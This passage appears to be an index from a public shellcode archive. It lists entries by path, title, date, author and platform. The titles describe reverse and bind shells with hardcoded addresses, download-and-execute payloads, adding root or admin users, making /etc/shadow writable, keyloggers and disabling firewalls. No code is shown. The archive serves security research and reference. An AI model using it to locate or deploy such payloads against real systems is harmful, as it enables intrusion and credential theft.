436 18162 shellcodes/linux_mips/18162.c Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes) 2011-11-27 rigan shellcode linux_mips
437 18163 shellcodes/linux_mips/18163.c Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes) 2011-11-27 rigan shellcode linux_mips
438 18197 shellcodes/linux_x86-64/18197.c Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes) Linux/x64 - execve(/bin/sh) Shellcode (52 bytes) 2011-12-03 X-h4ck shellcode linux_x86-64
439 18226 shellcodes/linux_mips/18226.c Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes) 2011-12-10 rigan shellcode linux_mips
440 18227 shellcodes/linux_mips/18227.c Linux/MIPS - reboot() Shellcode (32 bytes) 2011-12-10 rigan shellcode linux_mips
441 18294 shellcodes/linux_x86/18294.c Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode 2011-12-31 pentesters.ir shellcode linux_x86
442 18379 shellcodes/linux_x86/18379.c Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) 2012-01-17 rigan shellcode linux_x86
443 18585 shellcodes/linux_x86-64/18585.s Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) 2012-03-12 0_o shellcode linux_x86-64
444 18885 shellcodes/linux_x86/18885.c Linux/x86 - execve(/bin/dash) Shellcode (42 bytes) 2012-05-16 X-h4ck shellcode linux_x86
445 20196 shellcodes/linux_x86/20196.c Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) 2012-08-02 Jean Pascal Pereira shellcode linux_x86
446 21252 shellcodes/arm/21252.asm Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes) 2012-09-11 midnitesnake shellcode arm
448 21254 shellcodes/arm/21254.asm Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes) 2012-09-11 midnitesnake shellcode arm
449 40363 shellcodes/windows_x86/40363.c Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes) 2016-09-13 Roziul Hasan Khan Shifat shellcode windows_x86
450 22489 shellcodes/windows/22489.cpp Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes) 2012-11-05 b33f shellcode windows
451 40890 shellcodes/windows_x86-64/40890.c Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes) 2016-12-08 Roziul Hasan Khan Shifat shellcode windows_x86-64
452 23622 shellcodes/linux_x86/23622.c Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) 2012-12-24 Hamza Megahed shellcode linux_x86
453 24318 shellcodes/windows/24318.c Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode 2013-01-24 RubberDuck shellcode windows
454 25497 shellcodes/linux_x86/25497.c Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes) 2013-05-17 Russell Willis shellcode linux_x86
455 40387 shellcodes/hardware/40387.nasm Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes) 2016-09-16 Sean Dillon shellcode hardware
456 27132 shellcodes/linux_mips/27132.txt Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) 2013-07-27 Jacob Holcomb shellcode linux_mips
461 28996 shellcodes/windows/28996.c Windows - MessageBox + Null-Free Shellcode (113 bytes) 2013-10-16 Giuseppe D'Amore shellcode windows
462 29436 shellcodes/linux_mips/29436.asm Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes) 2013-11-04 Jacob Holcomb shellcode linux_mips
463 40352 shellcodes/windows_x86/40352.c Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes) 2016-09-08 Roziul Hasan Khan Shifat shellcode windows_x86
464 33836 shellcodes/windows/33836.txt shellcodes/windows/33836.c Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes) 2014-06-22 Giuseppe D'Amore shellcode windows
465 34060 shellcodes/linux_x86/34060.c Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes) 2014-07-14 ZadYree shellcode linux_x86
466 34262 shellcodes/linux_x86/34262.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes) 2014-08-04 Ali Razmjoo shellcode linux_x86
467 34592 shellcodes/linux_x86/34592.c Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) 2014-09-09 Ali Razmjoo shellcode linux_x86
468 34667 shellcodes/linux_x86-64/34667.c Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes) 2014-09-15 MadMouse shellcode linux_x86-64
469 34778 shellcodes/linux_x86/34778.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) 2014-09-25 Javier Tejedor shellcode linux_x86
470 35205 shellcodes/linux_x86-64/35205.txt shellcodes/linux_x86-64/35205.asm Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) 2014-11-10 Breaking.Technology shellcode linux_x86-64
471 35519 shellcodes/linux_x86/35519.txt shellcodes/linux_x86/35519.c Linux/x86 - rmdir() Shellcode (37 bytes) 2014-12-11 kw4 shellcode linux_x86
472 35586 shellcodes/linux_x86-64/35586.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
473 35587 shellcodes/linux_x86-64/35587.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) 2014-12-22 Sean Dillon shellcode linux_x86-64
474 35793 shellcodes/windows_x86/35793.txt Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86
475 35794 shellcodes/windows_x86-64/35794.txt Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes) 2015-01-13 Ali Razmjoo shellcode windows_x86-64
476 35868 shellcodes/linux_mips/35868.c Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes) 2015-01-22 Sanguine shellcode linux_mips
477 36411 shellcodes/generator/36411.txt shellcodes/generator/36411.py Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator) 2015-03-16 Ali Razmjoo shellcode generator
478 36274 shellcodes/linux_mips/36274.c Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
479 36276 shellcodes/linux_mips/36276.c Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes) 2015-03-05 Sang Min Lee shellcode linux_mips
480 36359 shellcodes/linux_x86-64/36359.c Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) 2014-03-27 Chris Higgins shellcode linux_x86-64
481 36391 shellcodes/linux_x86/36391.c Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
482 36393 shellcodes/linux_x86/36393.c Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
483 36394 shellcodes/linux_x86/36394.c Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) 2015-03-16 Maximiliano Gomez Vidal shellcode linux_x86
494 36780 shellcodes/windows_x86/36780.c Windows/x86 (XP SP3) - Restart Shellcode (57 bytes) 2015-04-17 TUNISIAN CYBER shellcode windows_x86
495 36781 shellcodes/generator/36781.py Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator) 2015-04-17 Konstantinos Alexiou shellcode generator
496 36857 shellcodes/linux_x86/36857.c Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes) 2015-04-29 noviceflux shellcode linux_x86
497 36858 shellcodes/linux_x86-64/36858.c Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes) Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes) 2015-04-29 noviceflux shellcode linux_x86-64
498 36921 shellcodes/linux_x86/36921.c Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes) 2015-05-06 Oleg Boytsev shellcode linux_x86
499 36908 shellcodes/linux_x86/36908.c Linux/x86 - exit(0) Shellcode (6 bytes) 2015-05-04 Febriyanto Nugroho shellcode linux_x86
500 37069 shellcodes/linux_x86/37069.c Linux/x86 - execve(/bin/sh) Shellcode (26 bytes) 2015-05-20 Reza Behzadpour shellcode linux_x86
504 37297 shellcodes/linux_x86/37297.txt Linux/x86 - Read /etc/passwd Shellcode (58 bytes) 2015-06-16 B3mB4m shellcode linux_x86
505 37358 shellcodes/linux_x86/37358.c Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) 2015-06-24 B3mB4m shellcode linux_x86
506 37359 shellcodes/linux_x86/37359.c Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes) 2015-06-24 B3mB4m shellcode linux_x86
507 37362 shellcodes/linux_x86-64/37362.c Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes) 2015-06-24 Bill Borskey shellcode linux_x86-64
508 37365 shellcodes/linux_x86/37365.c Linux/x86 - Download File + Execute Shellcode 2015-06-24 B3mB4m shellcode linux_x86
509 37366 shellcodes/linux_x86/37366.c Linux/x86 - Reboot() Shellcode (28 bytes) 2015-06-24 B3mB4m shellcode linux_x86
510 37384 shellcodes/linux_x86/37384.c Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) 2015-06-26 Bill Borskey shellcode linux_x86
512 37391 shellcodes/linux_x86/37391.asm Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
513 37392 shellcodes/linux_x86/37392.asm Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
514 37393 shellcodes/linux_x86/37393.asm Linux/x86 - exec /bin/dash Shellcode (45 bytes) 2015-06-26 Mohammad Reza Espargham shellcode linux_x86
515 37401 shellcodes/linux_x86-64/37401.asm Linux/x86-64 - execve() Encoded Shellcode (57 bytes) Linux/x64 - execve() Encoded Shellcode (57 bytes) 2015-06-27 Bill Borskey shellcode linux_x86-64
516 37495 shellcodes/linux_x86/37495.py Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator) 2015-07-05 Artem T shellcode linux_x86
517 37664 shellcodes/windows_x86/37664.c Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes) 2015-07-21 B3mB4m shellcode windows_x86
518 37749 shellcodes/linux_x86/37749.c Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes) 2015-08-10 Guillaume Kaddouch shellcode linux_x86
519 37758 shellcodes/windows_x86/37758.c Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes) Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes) 2015-08-12 noviceflux shellcode windows_x86
520 37762 shellcodes/linux_x86/37762.py Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator) 2015-08-12 Anastasios Monachos shellcode linux_x86
521 37895 shellcodes/windows_x86-64/37895.asm Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes) Windows/x64 (2003) - Token Stealing Shellcode (59 bytes) 2015-08-20 Fitzl Csaba shellcode windows_x86-64
522 38065 shellcodes/osx/38065.txt OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes) 2015-09-02 Fitzl Csaba shellcode osx
523 38075 shellcodes/system_z/38075.txt Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes) 2015-09-02 Bigendian Smalls shellcode system_z
524 38088 shellcodes/linux_x86/38088.c Linux/x86 - execve(/bin/bash) Shellcode (31 bytes) 2015-09-06 Ajith Kp shellcode linux_x86
525 38094 shellcodes/generator/38094.c Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) 2015-09-07 Ajith Kp shellcode generator
526 38116 shellcodes/linux_x86/38116.c Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes) 2015-09-09 Ajith Kp shellcode linux_x86
527 38126 shellcodes/osx/38126.c OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes) 2015-09-10 Fitzl Csaba shellcode osx
528 38150 shellcodes/linux_x86-64/38150.txt Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes) Linux/x64 - execve(/bin/sh) Shellcode (34 bytes) 2015-09-11 Fanda Uchytil shellcode linux_x86-64
529 38194 shellcodes/android/38194.c Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes) 2015-09-15 Steven Padilla shellcode android
530 38239 shellcodes/linux_x86-64/38239.asm Linux/x86-64 - execve() Shellcode (22 bytes) Linux/x64 - execve() Shellcode (22 bytes) 2015-09-18 d4sh&r shellcode linux_x86-64
531 38469 shellcodes/linux_x86-64/38469.c Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) Linux/x64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes) 2015-10-15 d4sh&r shellcode linux_x86-64
532 38708 shellcodes/linux_x86-64/38708.asm Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes) Linux/x64 - Egghunter (0x6b634068) Shellcode (24 bytes) 2015-11-16 d4sh&r shellcode linux_x86-64
533 38815 shellcodes/linux_x86-64/38815.c Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes) Linux/x64 - execve() + Polymorphic Shellcode (31 bytes) 2015-11-25 d4sh&r shellcode linux_x86-64
534 38959 shellcodes/generator/38959.py Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator) Windows (XP < 10) - Command Generator WinExec() + Null-Free Shellcode (Generator) 2015-12-13 B3mB4m shellcode generator
535 39149 shellcodes/linux_x86-64/39149.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) 2016-01-01 Scorpion_ shellcode linux_x86-64
536 39152 shellcodes/linux_x86-64/39152.c Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes) 2016-01-02 Sathish kumar shellcode linux_x86-64
537 39160 shellcodes/linux_x86/39160.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1) 2016-01-04 Dennis 'dhn' Herrmann shellcode linux_x86
538 39185 shellcodes/linux_x86-64/39185.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes) 2016-01-06 Sathish kumar shellcode linux_x86-64
539 39203 shellcodes/linux_x86-64/39203.c Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes) Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes) 2016-01-08 Sathish kumar shellcode linux_x86-64
540 39204 shellcodes/linux_x86/39204.c Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes) 2016-01-08 Dennis 'dhn' Herrmann shellcode linux_x86
541 39312 shellcodes/linux_x86-64/39312.c Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes) 2016-01-25 Sathish kumar shellcode linux_x86-64
542 39336 shellcodes/linux/39336.c Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) Linux x86/x64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes) 2016-01-27 B3mB4m shellcode linux
543 39337 shellcodes/linux/39337.c Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) Linux x86/x64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes) 2016-01-27 B3mB4m shellcode linux
544 39338 shellcodes/linux/39338.c Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes) Linux x86/x64 - Read /etc/passwd Shellcode (156 bytes) 2016-01-27 B3mB4m shellcode linux
545 39383 shellcodes/linux_x86-64/39383.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes) 2016-01-29 Sathish kumar shellcode linux_x86-64
546 39388 shellcodes/linux_x86-64/39388.c Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
547 39389 shellcodes/linux_x86/39389.c Linux/x86 - Download File + Execute Shellcode (135 bytes) 2016-02-01 B3mB4m shellcode linux_x86
548 39390 shellcodes/linux_x86-64/39390.c Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes) Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes) 2016-02-01 Sathish kumar shellcode linux_x86-64
549 39496 shellcodes/arm/39496.c Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes) 2016-02-26 Xeon shellcode arm
550 39519 shellcodes/windows_x86/39519.c Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) 2016-03-02 Sean Dillon shellcode windows_x86
551 39578 shellcodes/linux_x86-64/39578.c Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) Linux/x64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes) 2016-03-21 Sudhanshu Chauhan shellcode linux_x86-64
552 39617 shellcodes/linux_x86-64/39617.c Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes) Linux/x64 - execve(/bin/sh) Shellcode (26 bytes) 2016-03-24 Ajith Kp shellcode linux_x86-64
553 39624 shellcodes/linux_x86-64/39624.c Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1) Linux/x64 - execve(/bin/sh) Shellcode (25 bytes) (1) 2016-03-28 Ajith Kp shellcode linux_x86-64
554 39625 shellcodes/linux_x86-64/39625.c Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes) Linux/x64 - execve(/bin/bash) Shellcode (33 bytes) 2016-03-28 Ajith Kp shellcode linux_x86-64
555 39684 shellcodes/linux_x86-64/39684.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes) 2016-04-11 Ajith Kp shellcode linux_x86-64
556 39700 shellcodes/linux_x86-64/39700.c Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) Linux/x64 - Read /etc/passwd Shellcode (65 bytes) 2016-04-15 Ajith Kp shellcode linux_x86-64
557 39718 shellcodes/linux_x86-64/39718.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes) 2016-04-21 Ajith Kp shellcode linux_x86-64
558 40094 shellcodes/windows_x86/40094.c Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Windows/x86 - URLDownloadToFileA(http://192.168.86.130/sample.exe) + SetFileAttributesA(pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) 2016-07-13 Roziul Hasan Khan Shifat shellcode windows_x86
559 39722 shellcodes/linux_x86/39722.c Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
560 39723 shellcodes/linux_x86/39723.c Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes) 2016-04-25 Roziul Hasan Khan Shifat shellcode linux_x86
561 39728 shellcodes/generator/39728.py Linux/x86-64 - Bind TCP Shell Shellcode (Generator) Linux/x64 - Bind TCP Shell Shellcode (Generator) 2016-04-25 Ajith Kp shellcode generator
562 39731 shellcodes/windows/39731.c Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes) 2016-04-25 Fugu shellcode windows
563 39754 shellcodes/windows_x86/39754.txt Windows/x86 (.Net Framework) - Execute Native x86 Shellcode 2016-05-02 Jacky5112 shellcode windows_x86
564 39758 shellcodes/linux_x86-64/39758.c Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) Linux/x64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
565 39763 shellcodes/linux_x86-64/39763.c Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) Linux/x64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes) 2016-05-04 Roziul Hasan Khan Shifat shellcode linux_x86-64
566 39794 shellcodes/windows/39794.c Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes) 2016-05-10 Fugu shellcode windows
567 39815 shellcodes/generator/39815.c Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator) 2016-05-16 JollyFrogs shellcode generator
568 39847 shellcodes/linux_x86-64/39847.c Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) 2016-05-23 Roziul Hasan Khan Shifat shellcode linux_x86-64
569 39851 shellcodes/linux_x86/39851.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes) 2016-05-25 Brandon Dennis shellcode linux_x86
570 39869 shellcodes/linux_x86-64/39869.c Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes) Linux/x64 - execve() + XOR Encoded Shellcode (84 bytes) 2016-05-30 Roziul Hasan Khan Shifat shellcode linux_x86-64
571 39885 shellcodes/multiple/39885.c BSD / Linux / Windows/x86-64/x86 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) BSD / Linux / Windows - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes) 2016-06-06 odzhancode shellcode multiple
572 39900 shellcodes/windows_x86/39900.c Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) 2016-06-07 Roziul Hasan Khan Shifat shellcode windows_x86
573 39901 shellcodes/linux_x86/39901.c Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes) 2016-06-07 sajith shellcode linux_x86
574 39914 shellcodes/windows_x86/39914.c Windows/x86 - system(systeminfo) Shellcode (224 bytes) 2016-06-10 Roziul Hasan Khan Shifat shellcode windows_x86
575 39979 shellcodes/windows/39979.c Windows (XP < 10) - Download File + Execute Shellcode 2016-06-20 B3mB4m shellcode windows
576 40005 shellcodes/windows_x86/40005.c Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) 2016-06-22 Roziul Hasan Khan Shifat shellcode windows_x86
577 40026 shellcodes/linux_x86/40026.txt Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode 2016-06-27 Pawan Lal shellcode linux_x86
578 40029 shellcodes/linux_x86-64/40029.c Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) Linux/x64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes) 2016-06-28 Roziul Hasan Khan Shifat shellcode linux_x86-64
579 40052 shellcodes/linux_x86-64/40052.c Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) Linux/x64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes) 2016-07-04 Kyzer shellcode linux_x86-64
580 40056 shellcodes/linux_x86/40056.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes) 2016-07-04 sajith shellcode linux_x86
581 40061 shellcodes/linux_x86-64/40061.c Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) Linux/x64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) 2016-07-06 Kyzer shellcode linux_x86-64
582 40075 shellcodes/linux_x86/40075.c Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes) 2016-07-08 sajith shellcode linux_x86
583 40079 shellcodes/linux_x86-64/40079.c Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) Linux/x64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes) 2016-07-11 Kyzer shellcode linux_x86-64
584 40110 shellcodes/linux_x86/40110.c Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes) 2016-07-13 RTV shellcode linux_x86
585 40122 shellcodes/linux_x86-64/40122.txt shellcodes/linux_x86-64/40122.c Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) Linux/x64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes) 2016-07-19 Kyzer shellcode linux_x86-64
586 40128 shellcodes/linux_crisv32/40128.c Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes) 2016-07-20 bashis shellcode linux_crisv32
587 40131 shellcodes/linux_x86/40131.c Linux/x86 - execve(/bin/sh) Shellcode (19 bytes) 2016-07-20 sajith shellcode linux_x86
